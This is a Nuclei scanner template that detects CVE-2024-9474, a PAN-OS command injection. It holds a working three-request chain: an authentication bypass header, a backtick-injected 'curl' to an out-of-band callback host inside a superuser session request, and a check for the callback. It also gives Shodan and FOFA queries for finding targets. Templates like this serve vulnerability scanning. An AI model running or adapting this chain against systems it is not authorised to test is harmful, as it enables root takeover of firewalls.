id: CVE-2024-9474 info: name: PAN-OS Management Web Interface - Command Injection author: watchTowr,iamnoooob,rootxharsh,pdresearch severity: high description: | A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges. Cloud NGFW and Prisma Access are not impacted by this vulnerability. impact: | Authenticated administrators with access to the management web interface can escalate privileges to execute commands with root privileges on the PAN-OS firewall, achieving complete system control and bypassing security controls. remediation: | Apply security updates from Palo Alto Networks to address the privilege escalation and command injection vulnerability in the PAN-OS management web interface. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2024-9474 cwe-id: CWE-78 epss-score: 0.94766 epss-percentile: 0.9985 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: paloaltonetworks product: pan-os shodan-query: - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" - http.favicon.hash:"-631559155" fofa-query: icon_hash="-631559155" tags: cve,cve2024,panos,rce,kev,vkev,vuln flow: http(1) && http(2) && http(3) variables: rand: "{{to_lower(rand_text_alpha(5))}}" http: - raw: - | GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1 Host: {{Hostname}} X-PAN-AUTHCHECK: off matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "0.0.0")' - 'contains_all(header, "Expires: 0", "PHPSESSID=", "application/json")' condition: and internal: true - raw: - | POST /php/utils/createRemoteAppwebSession.php/{{rand}}.js.map HTTP/1.1 Host: {{Hostname}} X-PAN-AUTHCHECK: off Content-Type: application/x-www-form-urlencoded user=`curl+{{interactsh-url}}`&userRole=superuser&remoteHost=&vsys=vsys1 matchers: - type: word part: body words: - "@start@PHPSESSID=" internal: true extractors: - type: regex part: body name: phpsessid group: 1 regex: - '@start@PHPSESSID=(.*?)@end@' internal: true - raw: - | GET /index.php/.js.map HTTP/1.1 Host: {{Hostname}} Cookie: PHPSESSID={{phpsessid}} X-PAN-AUTHCHECK: off matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' - 'contains(body, "panos")' condition: and # digest: 490a0046304402200a13b421d998543b3dd76c164a1a1bcd763d7ff2bf0ea03734bcd53c8c3bb2a60220608c6b4c711a286a63f18e082a9d04e0a5d84c1e259c358363d26a4cc33c6a8b:922c64590222798bb761d5b6d8e72950